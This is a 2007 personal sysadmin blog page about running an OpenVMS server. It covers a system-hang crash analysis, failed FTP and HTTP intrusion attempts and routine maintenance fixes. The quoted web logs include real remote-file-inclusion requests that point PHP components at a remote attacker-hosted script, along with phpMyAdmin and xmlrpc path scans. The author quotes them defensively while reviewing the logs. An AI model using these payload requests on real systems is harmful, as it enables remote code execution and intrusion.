March 2007 – Page 2 – SYSMGR in the attic

13-Mar-2007

System hang
Diana appeared unrresponsive tonight, I had to stop the CPU and crash the system to find out what was going on.
In Operator log, theer is not a clue, just that it must have happened after 00:39:
%%%%%%%%%%% OPCOM 13-MAR-2007 00:29:19.84 %%%%%%%%%%% Message from user INTERnet on DIANA INTERnet ACP SMTP Accept Request from Host: 156.153.255.206 Port: 52398

%%%%%%%%%%% OPCOM Logfile time stampCrash analysis SDA> SHO SUM Current process summary ----------------------- Extended Indx Process name -- PID -- ---- --------------- 20200101 0001 SWAPPER 20200107 0007 CLUSTER_SERVER SYSTEM 20200108 0008 CONFIGURE 20200109 0009 LANACP 2020010B 000B IPCACP 2020010C 000C ERRFMT 2020010D 000D CACHE_SERVER 2020010E 000E OPCOM 2020010F 000F AUDIT_SERVER 20200110 0010 JOB_CONTROL 20200112 0012 QUEUE_MANAGER 20200113 0013 SECURITY_SERVER SYSTEM 20200114 0014 ACME_SERVER 20200117 0017 DNS$ADVER 20200118 0018 LES$ACP_V30 20200119 0019 NET$ACP 2020011A 001A REMACP 2020011B 001B NET$EVD 2020011C 001C DTSS$SERVICE 2020011D 001D SMISERVER 2020011E 001E TP_SERVER 20203921 0021 SMTP_DIANA_01 20200129 0029 DECW$SERVER_0 20200132 0032 TCPIP$INETACP 20200333 0033 TCPIP$BIND_1 20200135 0035 TCPIP$PORTM_1 20200136 0036 TCPIP$DHCP_1 20200137 0037 TCPIP$FTP_1 20200138 0038 TCPIP$IMAP_1 20200139 0039 TCPIP$NTP_1 2020013A 003A TCPIP$POP_1 2020013B 003B TCPIP$PWIP_ACP SYSTEM 2020013D 003D TCPIP$NTP_4646 2020013E 003E TCPIP$XDM_1 2020393F 003F DTLOGIN 20203940 0040 DTGREET 20200146 0046 HTTPd:80 20200147 0047 HyperSPI++ 20200148 0048 DBL$MSGMGR 2020014A 004A MYSQL_SERVER 2020014B 004B SYMBIONT_2 202040D6 00D6 HTTPd:80-25 202040D7 00D7 HTTPd:80-26 202040D8 00D8 HTTPd:80-27 202040D9 00D9 HTTPd:80-28 202040DA 00DA HTTPd:80-29 202040DB 00DB HTTPd:80-30 202040DC 00DC HTTPd:80-31 202040DD 00DD HTTPd:80-32 202040DE 00DE HTTPd:80-33 202040DF 00DF HTTPd:80-34 202040E0 00E0 HTTPd:80-35 202040E1 00E1 HTTPd:80-36 202040E2 00E2 HTTPd:80-37 202040E3 00E3 HTTPd:80-38 202040E4 00E4 HTTPd:80-39 20203CE5 00E5 HTTPd:80-40 20203DE6 00E6 HTTPd:80-41 202040E7 00E7 HTTPd:80-42 20203AE9 00E9 TCPIP$SM_BG5119 20203FEA 00EA TCPIP$SM_BG6439 202040EB 00EB TCPIP$SM_BG7024 202040EC 00EC TCPIP$SM_BG9759 202040ED 00ED TCPIP$S_BG12519 202040EE 00EE TCPIP$S_BG13032 202040EF 00EF TCPIP$S_BG13105 202040F0 00F0 TCPIP$S_BG14251 20203DF1 00F1 TCPIP$S_BG14323 202040F2 00F2 TCPIP$S_BG15158 I checked the TCPIP$S* 13-MAR-2007 00:39:47.81 %%%%%%%%%%% shows a weird symptom: Username State Pri PCB/KTB PHD Wkset ------------ ------- --- -------- -------- ------ SYSTEM HIB 16 818E45C8 818E4000 0 HIB 13 81D52E80 83992000 103 SYSTEM RWCAP 11 81D47E40 8398E000 19 SYSTEM RWCAP 15 81E7EAC0 83994000 21 SYSTEM RWCAP 11 81E83080 83998000 22 SYSTEM COMO 11 81E84580 8399A000 27 SYSTEM HIBO 16 81E85600 8399C000 32 SYSTEM COMO 11 81E87200 8399E000 32 AUDIT$SERVER HIB 10 81E89580 839A0000 104 SYSTEM COMO 11 81E8BA40 839A2000 32 SYSTEM COMO 11 81E8DC80 839A4000 30 RWCAP 11 81EA7040 839A6000 106 SYSTEM HIB 8 81E37940 839A8000 214 SYSTEM RWCAP 7 81E80280 83996000 233 SYSTEM HIB 8 81EAF340 839AA000 94 DNA$SessCtrl COMO 11 81FC8E40 839AC000 27 SYSTEM HIBO 8 81FD0100 839AE000 21 SYSTEM COMO 11 81FD3740 839B0000 28 SYSTEM LEFO 10 81FD9480 839B2000 32 SYSTEM COMO 11 81FDE980 839B4000 25 SYSTEM RWCAP 11 81FE1C00 839B6000 57 SYSTEM HIBO 4 820C41C0 839BE000 30 SYSTEM RWCAP 9 81FE8D40 839BC000 375 INTERnet HIB 10 81FE95C0 839BA000 148 TCPIP$BIND RWCAP 11 820283C0 839C0000 179 TCPIP$PORTM COMO 11 82029000 839C2000 24 TCPIP$DHCP COMO 11 820940C0 839C4000 32 TCPIP$FTP COMO 11 8209DB80 839C6000 31 TCPIP$IMAP RWCAP 11 820AA340 839C8000 84 TCPIP$NTP RWCAP 11 820B0580 839CA000 169 TCPIP$POP COMO 11 820B2F80 839CC000 32 HIB 8 820B9540 839CE000 204 TCPIP$NTP COMO 11 820BB540 839D2000 25 TCPIP$XDM COMO 11 820D1C00 839D4000 25 LEFO 4 81D49A00 839DA000 32 SYSTEM COMO 11 820DE600 83990000 31 HTTP$SERVER RWCAP 7 820D4AC0 839D6000 453 SYSTEM RWCAP 9 820DA8C0 839DC000 70 SYSTEM COMO 11 8210D940 839DE000 26 MYSQL_SERVER RWCAP 6 82110140 839E2000 1525 SYSTEM RWCAP 7 8210E400 839E0000 55 HTTP$NOBODY COMO 11 81FE7040 839B8000 32 HTTP$NOBODY RWCAP 7 820D8A00 839D0000 873 HTTP$NOBODY COMO 11 82133D40 839D8000 32 HTTP$NOBODY COMO 11 820D7440 839E4000 32 HTTP$NOBODY RWCAP 7 82118BC0 839E6000 2460 HTTP$NOBODY COMO 11 82119E00 839E8000 32 HTTP$NOBODY COMO 11 820DC280 839EA000 32 HTTP$NOBODY COMO 11 820F1600 839EC000 32 HTTP$NOBODY RWCAP 7 820DDE00 839EE000 864 HTTP$NOBODY COMO 11 82503D80 839F0000 32 HTTP$NOBODY RWCAP 11 81FE3240 839F2000 589 HTTP$NOBODY RWCAP 7 82518AC0 839F4000 619 HTTP$NOBODY RWCAP 7 822D8CC0 839F6000 483 HTTP$NOBODY RWCAP 7 820DF940 839F8000 581 HTTP$NOBODY RWCAP 11 822253C0 839FA000 531 HTTP$NOBODY COMO 11 825037C0 839FC000 32 HTTP$NOBODY COMO 11 82226500 839FE000 32 HTTP$NOBODY COMO 11 8222D100 83A00000 32 TCPIP$SMTP RWCAP 11 82134A00 83A02000 271 TCPIP$SMTP RWCAP 11 82126600 83A04000 106 INTERnet COMO 11 82517F40 00000000 8 INTERnet COMO 11 8269E900 00000000 8 INTERnet COMO 11 82285E40 00000000 8 INTERnet COMO 11 8251A780 00000000 8 INTERnet COMO 11 8254A440 00000000 8 INTERnet COMO 11 82502C40 00000000 8 INTERnet COMO 11 8268BA00 00000000 8 INTERnet COMO 11 82622DC0 00000000 8
processes: I could only access the first two ones because the rest is swapped out and can therfore not be accessed. The first of them has a lot of sections files opened, and one BG-device: the one listed in it’s name:

SDA> SHO PROC/IND=E9/CHAN Channel CCB Window Status Device/file accessed ------- --- ------ ------ -------------------- ... 0150 7FF76280 81E67AC0 $116$DKA100:(3814,2,0) (section file) 0160 7FF762A0 00000000 BG5119: 0170 7FF762C0 824F5180 $116$DKA100:(9006,2,0) 0180 7FF762E0 82021C00 $116$DKA100:(8793,3,0) (section file)
but the second one has just 16 channels opened – and BG6439 is not opened – not yet, nor no more, I cannot tell from here.
However, I could get the other devices by another way:
SDA> TCPIP SHO DEV BG* ... BG7024 Stream 25 2232 SMTP 90.10.163.238 ESTAB BG9759 Stream 25 2222 SMTP 219.91.78.141 ESTAB BG11183 Idle BG11189 Stream 25 0 SMTP LISTEN BG12519 Stream 25 4927 SMTP 196.204.217.69 ESTAB BG13032 Stream 25 57913 SMTP 63.251.223.186 CLOSEWT BG13105 Stream 25 58231 SMTP 63.251.223.186 CLOSEWT BG14251 Stream 25 60648 SMTP 63.251.223.186 CLOSEWT BG14323 Stream 25 60783 SMTP 63.251.223.186 CLOSEWT BG15158 Stream 25 10093 SMTP 76.1.5.201 ESTAB ...
All referring to these processes.
Port 80 – the HTTP server – might be a cause as well:
BG4911 Stream 80 55225 66.135.34.87 CLOSEWT BG4921 Stream 80 59178 64.34.165.60 CLOSEWT BG4925 Stream 80 60734 72.36.254.194 CLOSEWT BG4936 Stream 80 60567 216.118.117.66 CLOSEWT BG4938 Stream 80 55250 66.135.34.87 CLOSEWT BG4948 Stream 80 47724 72.36.254.186 CLOSEWT BG4950 Stream 80 47728 72.36.254.186 CLOSEWT BG4951 Stream 80 47726 72.36.254.186 CLOSEWT BG5021 Stream 80 54992 74.6.67.198 CLOSEWT BG5030 Stream 80 59334 66.249.72.142 CLOSEWT
and there are quite a few HTTP processes running.
Anyway, after reboot, all seems Ok.
This needs futher investigation!
According the books, RWCAP maens: Waiting for CPU capacity. But no process is kepting the CPU, at least, so it seems – there is no process in CUR state. Obviously, perhaps, since I stopped the CPU and crashed the system 😉

I checked the logfiles of SMTP:
$ dir tcpip$smtp_common:/sin/dat


Directory SYS$SPECIFIC:[TCPIP$SMTP]

TCPIP$SMTP_LOGFILE.LOG;577 13-MAR-2007 19:20:35.24 TCPIP$SMTP_RECV_RUN.LOG;16985 13-MAR-2007 19:57:45.37 TCPIP$SMTP_RECV_RUN.LOG;16984 13-MAR-2007 01:20:49.60 TCPIP$SMTP_RECV_RUN.LOG;16983 13-MAR-2007 00:29:58.79
These last two didnot finish:
$ Set NoOn $ VERIFY = F$VERIFY(F$TRNLNM("SYLOGIN_VERIFY")) [End of file]
and the preceeding one did.

So that concludes the problem must have been starting at 00:30 or so – with this message attempt?.

It’s not in the webserver access logfile:
74.6.68.199 - - [12/Mar/2007:23:54:25 +0100] "GET /family/Willem/viewpoint_3.ht diana.intra.grootersnet.nl - HTTP$SERVER [13/Mar/2007:19:20:43 +0100] "POST /DI 66.249.72.142 - - [13/Mar/2007:19:20:47 +0100] "GET /family/Holiday2004/22-Jul/
or any other.

RWCAP: The OpenVMS Alpha Internals book states (paragraph 2.4.2):

…A COM kernel thread selected for execution can enter the RWCAP miscellanious wait state if its capability and affinity requirement have no match on any active member of an SMP system…

This is really weird, since Diana is a single-CPU system. It might mean that something WAS wrong internally: any capability (CPB$V_RUN, CPB$V_QUORUM of CPB$V_PRIMARY may have been lost.

(To be contiinued)

11-Mar-2007

FTP – in OPERATOR.LOG

It has been months ago that an attempt to abuse the anonymous FTP account, but in yesterday’s log, there is one:

%%%%%%%%%%% OPCOM 10-MAR-2007 21:53:19.82 %%%%%%%%%%% Message from user TCPIP$FTP on DIANA User Name: anonymous Source: host104-231-static.110-62-b.business.telecomitalia.it Status: NOPRIV -- File access violation Object: WEB_DISK2:[public.anonymous.070310215318p]

In FTP’s run-log, this attempt is shown in full. For readability, I lefy out (as usual) all extra lines, just showing what’s been attempted:

%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from host104-231-static.110-62-b.business.telecomitalia.it at 10-MAR-2007 21:53:16.17 %TCPIP-I-FTP_NODE, client host name: host104-231-static.110-62-b.business.telecomitalia.it %TCPIP-I-FTP_USER, user name: anonymous %TCPIP-I-FTP_OBJ, object: /pub/ %TCPIP-I-FTP_CHINFO, TCPIP$FTPC00062: Failed to set default directory %SYSTEM-W-BADIRECTORY, bad directory file format %TCPIP-I-FTP_NODE, client host name: host104-231-static.110-62-b.business.telecomitalia.it %TCPIP-I-FTP_USER, user name: anonymous %TCPIP-I-FTP_OBJ, object: /public/incoming/ %TCPIP-I-FTP_CHINFO, TCPIP$FTPC00062: Failed to set default directory %TCPIP-I-FTP_OBJ, object: /pub/incoming/ %TCPIP-I-FTP_OBJ, object: /incoming/ %TCPIP-I-FTP_OBJ, object: /upload/ %TCPIP-I-FTP_OBJ, object: /_vti_pvt/ %TCPIP-I-FTP_OBJ, object: /_vti_txt/ %TCPIP-I-FTP_OBJ, object: /_vti_log/ %TCPIP-I-FTP_OBJ, object: /wwwroot/ %TCPIP-I-FTP_OBJ, object: /anonymous/ %TCPIP-I-FTP_OBJ, object: /public/ %TCPIP-I-FTP_OBJ, object: WEB_DISK2:[public.anonymous.070310215318p] %TCPIP-I-FTP_CHINFO, TCPIP$FTPC00062: Failed to create directory %SYSTEM-F-NOPRIV, insufficient privilege or object protection violation %TCPIP-I-FTP_NODE, client host name: host104-231-static.110-62-b.business.telecomitalia.it %TCPIP-I-FTP_USER, user name: anonymous
This is the one that shows up in operator.log. The attemps in last months did not attempt to create a directory so that will be the reason the attempt doesn’t show up in operartor.log
%TCPIP-I-FTP_OBJ, object: /outgoing/ %TCPIP-I-FTP_OBJ, object: /temp/ %TCPIP-I-FTP_OBJ, object: /tmp/ %TCPIP-I-FTP_OBJ, object: /anonymous/_vti_pvt/ %TCPIP-I-FTP_OBJ, object: /anonymous/incoming/ %TCPIP-I-FTP_OBJ, object: /mailroot/ %TCPIP-I-FTP_OBJ, object: /ftproot/ %TCPIP-I-FTP_OBJ, object: /anonymous/pub/ %TCPIP-I-FTP_OBJ, object: /anonymous/public/ %TCPIP-I-FTP_OBJ, object: /_vti_cnf/ %TCPIP-I-FTP_OBJ, object: /anonymous/_vti_cnf/ %TCPIP-I-FTP_OBJ, object: /images/ %TCPIP-I-FTP_OBJ, object: /_private/ %TCPIP-I-FTP_OBJ, object: /cgi-bin/ %TCPIP-I-FTP_OBJ, object: /usr/ %TCPIP-I-FTP_OBJ, object: /usr/incoming/ %TCPIP-I-FTP_OBJ, object: /home/ %TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]tagged %TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]Tagged %TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]TaGGeD %TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]data %TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]Data %TCPIP-I-FTP_OBJ, object: SYS$POSIX_ROOT^:^[000000^]^%

%TCPIP-I-FTP_SESDCN, FTP SERVER: session disconnection from host104-231-static.110-62-b.business.telecomitalia.it at 10-MAR-2007 21:53:23.22

A script, no doubt, and not a very clever one either. No-one is able to type all these attempts within a minute.
The ISP (telecomitalia.it) will be notified.

8-Mar-2007

More attempts by HTTP

If it weren’t a pest to other systems, I could laugh loudly. The thought you could bring the server down by simply accessing default locations as if this were a standard Windows or Linux system. Take last week’s server log for the public web:
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868 69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
He tried it again some time later, given the the same address and, at first glance, the same script, and of course, the same outcome: NOTHING.
The same applies to this attempt. I’m not sure but it looks like a forum package to me:
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /index.php?page=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /live/help.php?css_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360 216.73.96.220 - - [23/Feb/2007:07:46:44 +0100] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
Yes, I do have MySQL and of course PHPMyAdmin, but what makes this guy think it would be on a publicly accessable site? That would be asking for trouble:
193.164.131.46 - - [25/Feb/2007:11:49:52 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /NoService.html HTTP/1.0" 200 2135 193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /PMA/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /mysql/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /admin/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /db/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /dbadmin/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /web/phpMyAdmin/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/pma/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/phpmyadmin/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/mysql/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /phpmyadmin2/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /mysqladmin/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /mysql-admin/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /myadmin/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:59 +0100] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 302 341 193.164.131.46 - - [25/Feb/2007:11:49:59 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 302 341
I wonder what HIS system would look like. That would be an easy site to crack!

8-Mar-2007

08-Mar-2007

Some maintenace on system management procedures
needed to be done.

For some reason, the procedure that cycles the operator log and scans it for spam attempts hasn’t been working properly since the beginning of the week. That is: there has been no copy of operator log files to the operator web, and the spamlist hasn’t been updated. I just found that this was quite obvious since creation of new logfiles did not occur. The log of the job does not show an error, but new files were not created, and the current one was the one of last Monday.

I recall I had made slight changes last weekend, and the next run failed because the input file wasn’t found when the batch job started:
$ type scan_log.log.-2 Error opening primary input file SYS$INPUT File not found SYSTEM job terminated at 5-MAR-2007 00:00:00.10 $
so there was no job entry on the next day either.
I thought I hadn’t purged, but it seems I had. Well, no problem: submit it again – forgetting it needs to be run as a user that has OPER privilege enabled by default. My standard account has OPER priv – as an authorized privilege, not enabled by default. Hence, no REPLY…. Weird that it didn’t show up in the log:
Starting new log.operator $ define/user sys$command _opa0: $ reply/enable $ define/user sys$command _opa0: $ reply/log ! nieuwe logfile $ define/user sys$command _opa0: $ reply/disable $ wait 00:01 ! wait a minute $ set nover
OPERATOR.LOG does not signal this either – obviously:
%%%%%%%%%%% OPCOM 4-MAR-2007 23:26:50.87 %%%%%%%%%%% Message from user INTERnet on DIANA INTERnet ACP SMTP Accept Request from Host: 216.148.221.135 Port: 28690


%%%%%%%%%%%  OPCOM   4-MAR-2007 23:39:44.59  %%%%%%%%%%%

Logfile time stamp
%%%%%%%%%%%  OPCOM   5-MAR-2007 00:39:44.60  %%%%%%%%%%%

Logfile time stamp

%%%%%%%%%%% OPCOM 5-MAR-2007 01:04:04.41 %%%%%%%%%%% Message from user INTERnet on DIANA INTERnet ACP SMTP Accept Request from Host: 156.153.255.213 Port: 33873
The problem is now solved – I hope. I ran the script – unaltered – with privs enabled and the logfile has been cycled and scanned. So I altered teh script be be sure it will be re-submitted under the right user now.
We’ll see tomorrow.
More typo’s
In the same log, it turns out that scanning for failed logins – at least, I suspect the problem to be there – has some typo as well. It does work, I saw the log has been updated, but I simply don’t like errors like this:
... %BACKUP-S-CREATED, created WEB_DISK2:[private.ftp]tcpip$ftp_run.txt;77 %DCL-W-EXPSYN, invalid expression syntax - check operators and operands Done ...
Tonight, it will run with verification enabled, so hopefully the error will show up in the log, so I can do some repair. Lucily, this script is called by the daily log scanner and not submitted by itself, so any change will be effective immediately.
MySQL backup
doesn’t run well either in batch. The resulting SQL script ends:
/*!40000 ALTER TABLE `bbposts_text` DISABLE KEYS */; LOCK TABLES `bbposts_text` WRITE; %TYPE-F-WRITEERR, error writing SYS$OUTPUT:.; -RMS-F-SYS, QIO system service request failed -SYSTEM-F-EXQUOTA, process quota exceeded
Same problem as the log scanner: it doesn’t run under an account that is sufficiently privileged by default – so that has been changed as well, and the job re-submitted. One more to be checked tomorrow.

6-Mar-2007

06-Mar-2007

WordPress update
has just been done – to version 2.0.9. as usual; no problems, once the right files were re-retrieved from backup. Anyway: the classes.zip in this version has been corrected so now runs the same version as can be downloaded from the WordPress.org site.
version 2.1.2 has been downloaded and will be tested before it’s been put into production. Glad I didn’t isntall it yet – the site has been hacked and a few files altered by the hacker. Time they get a VMS box 🙂
Update of VMS
has been postponed a few weeks, I need some more time to prepare the installation of the update. It’s not that important, so I decided I can take the “risk”.
Mail problems
that I found a few weeks ago: VMS Mail, or better: the standard SMTP, cannot handle “numbered domains” we have over here: sending mail /TO=user@name.number.nl generates an error, and I tried that with Quintara as well. Today I got a mail they’re wording on their own SMTP engine to overcome limitations in the “official” software, and enhance it with required facilities. But Quintara uses SWS that I abandoned. It’s not a real problem, since tha named domain will be dropped one of these days anyway.

March 2007
M	T	W	T	F	S	S
« Feb				Apr »
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31